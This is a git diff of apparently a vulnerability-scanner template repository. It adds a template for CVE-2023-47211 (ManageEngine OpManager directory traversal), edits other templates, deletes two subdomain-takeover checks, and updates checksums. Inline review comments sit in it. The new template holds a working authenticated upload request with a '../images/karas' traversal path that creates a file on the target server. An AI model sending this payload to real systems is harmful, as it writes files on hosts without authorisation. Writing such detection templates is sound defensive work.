diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index f102ab2d4a..9ed1ed1ca0 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -82,6 +82,7 @@ on:
 - 'http/cves/2023/CVE-2023-22527.yaml'
 - 'http/cves/2023/CVE-2023-27639.yaml'
 - 'http/cves/2023/CVE-2023-27640.yaml'
+ - 'http/cves/2023/CVE-2023-47211.yaml'
 - 'http/cves/2023/CVE-2023-48023.yaml'
 - 'http/cves/2023/CVE-2023-6023.yaml'
 - 'http/cves/2023/CVE-2023-6875.yaml'
diff --git a/.new-additions b/.new-additions
index fac3f0f907..42a9f97703 100644
--- a/.new-additions
+++ b/.new-additions
@@ -77,6 +77,7 @@ http/cves/2018/CVE-2018-10942.yaml
 http/cves/2023/CVE-2023-22527.yaml
 http/cves/2023/CVE-2023-27639.yaml
 http/cves/2023/CVE-2023-27640.yaml
+http/cves/2023/CVE-2023-47211.yaml
 http/cves/2023/CVE-2023-48023.yaml
 http/cves/2023/CVE-2023-6023.yaml
 http/cves/2023/CVE-2023-6875.yaml
diff --git a/cves.json b/cves.json
index 2a49045e15..e6047a15d8 100644
--- a/cves.json
+++ b/cves.json
@@ -2232,6 +2232,7 @@
 {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
 {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. 
An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"}
 {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
 {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
 {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 5b2d5c39c4..93e594a985 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-05564255e098e325ecbfdfd43751f476
+c95ebe1b9b7034e3fe834994f5aaf6ba
diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml
index 5b9d52f88d..f58bee6ef3 100644
--- a/http/cves/2021/CVE-2021-39327.yaml
+++ b/http/cves/2021/CVE-2021-39327.yaml
@@ -45,6 +45,12 @@ http:
 - '=================='
 condition: and
 
+ - type: regex
+ negative: true
+ part: body
+ regex:
+ - '^BPS\sDB\sBACKUP\sLOG\r\n==================\r\n==================\r\n\r\n$'
+
 - type: word
 part: header
 words:
@@ -53,4 +59,4 @@ http:
 - type: status
 status:
 - 200
-# digest: 4a0a00473045022100af3dd0939f62b4cb86987680c8af5e298418eb98e823b6fcec9e342d1a27c69e02206c8d9f34d0eedd307ab441de49c36ae76fce1baeae4b5d4e5ce6ba570fba4ca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210086b49046ea527338562988b0b54d2d60e2df3f6d3e9ec183a2f59cc54041e4ba022100b6cbd53cc294fac59fed7a4386be9d3b13e3cdebfd3eb1c20f4a895e1d8c2484:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml
new file mode 100644
index 0000000000..41c54ab4b7
--- /dev/null
+++ b/http/cves/2023/CVE-2023-47211.yaml
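Review bot: The new negative regex only suppresses the empty-log body when every line ending is exactly `\r\n` and the body ends immediately after the last blank line; a response that uses bare `\n`, or carries any trailing whitespace, still satisfies the positive word matchers and is reported as an exposed backup log. Loosening the anchors covers both cases: `- '^BPS\sDB\sBACKUP\sLOG\r?\n==================\r?\n==================\s*$'`. The `matchers` list this entry belongs to starts before the hunk, so how `matchers-condition` combines this negative matcher with the existing ones is not visible here.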
@@ -0,0 +1,114 @@
+id: CVE-2023-47211
+
+info:
+ name: ManageEngine OpManager - Directory Traversal
+ author: gy741
+ severity: high
+ description: |
+ A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2023-47211
+ cwe-id: CWE-22
+ epss-score: 0.000610000
+ epss-percentile: 0.238320000
+ cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"OpManager Plus"
+ tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi
+
+http:
+ - raw:
+ - |
+ POST /two_factor_auth HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ j_username={{username}}&j_password={{password}}
+
+ - |
+ POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+ Host: {{Hostname}}
+ X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+ Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+ -----------------------------372334936941313273904263503262
+ Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+ Content-Type: text/plain
+
+ ../images/karas DEFINITIONS ::= BEGIN
+
+
+ IMPORTS
+ enterprises
+ FROM RFC1155-SMI;
+
+ microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
+ software OBJECT IDENTIFIER ::= { microsoft 1 }
+ systems OBJECT IDENTIFIER ::= { software 1 }
+ os OBJECT IDENTIFIER ::= { systems 3 }
+ windowsNT OBJECT IDENTIFIER ::= { os 1 }
+ windows OBJECT IDENTIFIER ::= { os 2 }
+ workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
+ server OBJECT IDENTIFIER ::= { windowsNT 2 }
+ dc 
OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+ END
+
+ -----------------------------372334936941313273904263503262--
+
+ - |
+ POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+ Host: {{Hostname}}
+ X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+ Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+ -----------------------------372334936941313273904263503262
+ Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+ Content-Type: text/plain
+
+ ../images/karas DEFINITIONS ::= BEGIN
+
+
+ IMPORTS
+ enterprises
+ FROM RFC1155-SMI;
+
+ microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
+ software OBJECT IDENTIFIER ::= { microsoft 1 }
+ systems OBJECT IDENTIFIER ::= { software 1 }
+ os OBJECT IDENTIFIER ::= { systems 3 }
+ windowsNT OBJECT IDENTIFIER ::= { os 1 }
+ windows OBJECT IDENTIFIER ::= { os 2 }
+ workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
+ server OBJECT IDENTIFIER ::= { windowsNT 2 }
+ dc OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+ END
+
+ -----------------------------372334936941313273904263503262--
+
+ host-redirects: true
+ max-redirects: 3
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "application/json")'
+ - 'contains(body, "MIBFile with same name already exists")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: x_zcsrf_token
+ group: 1
+ part: header
+ regex:
+ - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
+ internal: true
+# digest: 4a0a00473045022100d0db16ab8c46ac09c0a481c477c237858642663e12d9ddd8734591713833a2a7022026241af2d76fb1c58e6b80046a5ae5c231df7ac82ce627e4cc345bb039b87a09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml
index beeaead6f6..0b310c786c 100644
--- a/http/cves/2024/CVE-2024-0204.yaml
+++ b/http/cves/2024/CVE-2024-0204.yaml
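Review bot: `max-request: 1` under `metadata` does not match the raw block, which sends three requests (the login and two uploads); it should read `max-request: 3`. The check creates a file on the target through the `../images/karas` traversal path and then relies on the repeated upload being refused with `MIBFile with same name already exists`, so every run leaves an artifact on the host — state this in a comment above `http:` and, if the repository uses its `intrusive` tag for state-changing templates, add it to `tags`. The `cpe` value names `manageengine_firewall_analyzer` while the name, description and shodan-query all refer to OpManager; confirm the product identifier against the NVD entry before relying on it for matching. `lfi` in `tags` is also inaccurate for an arbitrary file write.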
@@ -19,7 +19,7 @@ info:
 metadata:
 verified: true
 max-request: 1
- shodan-query: http.favicon.hash:1484947000
+ shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 || html:InvalidBrowser.xhtml
 tags: cve,cve2024,auth-bypass,goanywhere
 
 http:
@@ -39,4 +39,4 @@ http:
 - type: status
 status:
 - 200
-# digest: 4a0a0047304502200c0737654cbbb14c8e7da4470731e92dace06ddccf481af6ed760cb99c5d75e5022100be491a724570489903e091ba728fa5d7fee4ef4cefd643d1c89ca314edd55f32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204cf4124e1cf41e749682dfd2780edee610ad177d8f87b7e5adfaad7e1deaf55602200b1c67b0a6ee6be3e4fc0b8a89ae9672ae6995e4dce26b247f1881f6b4954312:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/flywheel-takeover.yaml b/http/takeovers/flywheel-takeover.yaml
deleted file mode 100644
index de53cb511d..0000000000
--- a/http/takeovers/flywheel-takeover.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: flywheel-takeover
-
-info:
- name: Flywheel Subdomain Takeover
- author: smaranchand
- severity: high
- description: Flywheel takeover was detected.
- reference:
- - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover
- metadata:
- verified: true
- max-request: 1
- shodan-query: http.html:"Flywheel"
- tags: takeover,flywheel
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: or
- matchers:
- - type: word
- part: body
- words:
- - "We're sorry, you've landed on a page that is hosted by Flywheel" - "

Oops! That's not the site
you're looking for.

"
- condition: and
-
- - type: word
- part: body
- words:
- - "We are sorry, you've landed on a page that is hosted by Flywheel"
-# digest: 4a0a00473045022100c65c64d3a7226e36ae3cf134895cc98fb03a04cdfc9dc431eeb61696a096dd380220464ee36598416ac00838699b717d73b587432b2ed738fe71b2b5da09cc272ab6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml
deleted file mode 100644
index b486fedab0..0000000000
--- a/http/takeovers/webflow-takeover.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: webflow-takeover
-
-info:
- name: webflow takeover detection
- author: pdteam,keni0k
- severity: high
- description: webflow takeover was detected.
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44
- - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172
- metadata:
- max-request: 1
- tags: takeover
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - Host != ip
-
- - type: word
- words:
- - "The page you are looking for doesn't exist or has been moved."
- - "The page you are looking for doesn't exist or has been moved"
-

The page you are looking for doesn't exist or has been moved.

- condition: or
-# digest: 490a0046304402206aed9372445d22034b81f846be32bf9c3b3274420a26c29037fd09e1eba21866022034d5c6a742ebe4e8ef4cd8494567c6650f44dfd236288046400e794713646e86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 88b94da714..a28106af09 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -102,8 +102,8 @@ config/osint.yml:846ae0c6f62f669b094a5e1dd47843fd5ff32395
 config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ef9364efbde5e7993f18e9b50723f1050dc9d75e
-cves.json-checksum.txt:196f9663089b6233c678f1c7e691bbc39557de82
+cves.json:7be9d972493b1a4c98165486c82e45afbf776118
+cves.json-checksum.txt:24b707d1313a1689aebe90bc748be2aabd5f732b
 dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@@ -2128,7 +2128,7 @@ http/cves/2021/CVE-2021-39312.yaml:64d165e28ec5a707dc634b224ac54e3104ed2800
 http/cves/2021/CVE-2021-39316.yaml:8ca434b922003596d8237b873b11bb21b5518ed8
 http/cves/2021/CVE-2021-39320.yaml:ee3b0a1e22774e2a32695553daadc042c88e7fe8
 http/cves/2021/CVE-2021-39322.yaml:cd7b1f3f9db49e2190a27a9ae442989fd47161e1
-http/cves/2021/CVE-2021-39327.yaml:8ace5ce89ee650d719d2e75111d1127c4bdc2433
+http/cves/2021/CVE-2021-39327.yaml:82ac7a9c777b6ccbd979552187b525f3e8e2943f
 http/cves/2021/CVE-2021-39350.yaml:ffe96a09f03658f9e3c200a4871f11ea1a1f84ef
 http/cves/2021/CVE-2021-39433.yaml:07e2f35b5d4dda5a3b884a39e5d2cbba43f41a24
 http/cves/2021/CVE-2021-39501.yaml:71ed3e4cb94325f5aa287d47a82e9ec44a3f7791
@@ -2988,6 +2988,7 @@ http/cves/2023/CVE-2023-46574.yaml:d39bb36ad3ad2ca72034abe7139d9ecb3d131bb6
 http/cves/2023/CVE-2023-46747.yaml:87070639881b268dd3e220d7d259dd90733c65f5
 http/cves/2023/CVE-2023-46805.yaml:f1bdb094c431bd1128a3630f865050617fc62016
 http/cves/2023/CVE-2023-4714.yaml:da97fe934a7bced5b02a8cad6acb4222a7b41905
+http/cves/2023/CVE-2023-47211.yaml:83094654f4cad6c39d23fcfe372cf55a05a349a5
 http/cves/2023/CVE-2023-47246.yaml:0cbbf14af567525b94bb41bc6be327c666ce44ba
 http/cves/2023/CVE-2023-48023.yaml:232bb9e1cb23b2c52849c96f58bcc856c3422bed
 http/cves/2023/CVE-2023-49070.yaml:bc09f7344ea3ebf3d441c41d708a7edca91c2dd2
@@ -3016,7 +3017,7 @@ http/cves/2023/CVE-2023-6623.yaml:62b2101ac20cbd8e8d951d835db41ebc8167e217
 http/cves/2023/CVE-2023-6634.yaml:2c1b9d81bc80a75902686df1405ff1de1336538d
 http/cves/2023/CVE-2023-6875.yaml:f867e6ef03e3266d1cec3d9ced107c917f76a98a
 http/cves/2023/CVE-2023-7028.yaml:1372fe3d2ddf8e3cd3960bcd60cbc6e4d438eb81
-http/cves/2024/CVE-2024-0204.yaml:2868f41485c7f25ece52717011b0ca726e322efd
+http/cves/2024/CVE-2024-0204.yaml:a496161a6425754e7ee8cd623d473709f3862912
 http/cves/2024/CVE-2024-0352.yaml:6a6fc846f6b5486d7e76f66a3bbd8f367d52f077
 http/cves/2024/CVE-2024-21887.yaml:ba5ec455781639fc9679d3a6b37ba784f87918fe
 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
@@ -5087,7 +5088,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac
 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
 http/misconfiguration/misconfigured-docker.yaml:f69b164e183b7c668ba054389e77c6aa3cc25fb6
 http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40
-http/misconfiguration/mixed-active-content.yaml:dfcfc0e7e3a735db753079828af5251165b01c53
+http/misconfiguration/mixed-active-content.yaml:1a958c89b06668be58457e142802ce450ec76e33
 http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc
 http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08
 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8
@@ -5948,7 +5949,6 @@ http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452
 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3
 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87
 http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181
-http/takeovers/flywheel-takeover.yaml:61d2bc14e417d1dca72d6c392f1e8df707b28300
 http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb
 http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68
 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd
@@ -5996,7 +5996,6 @@ http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef
 http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472
 http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6
 http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd
-http/takeovers/webflow-takeover.yaml:04ee1fc244dea4b56e52a51b8833f3067055eccc
 http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3
 http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d
 http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd
@@ -7857,7 +7856,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4
-templates-checksum.txt:d3136794c21df11cec97d887307db544b7c476c5
+templates-checksum.txt:a230836ff778691b2388b8d6ffbe76b64a0e7985
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4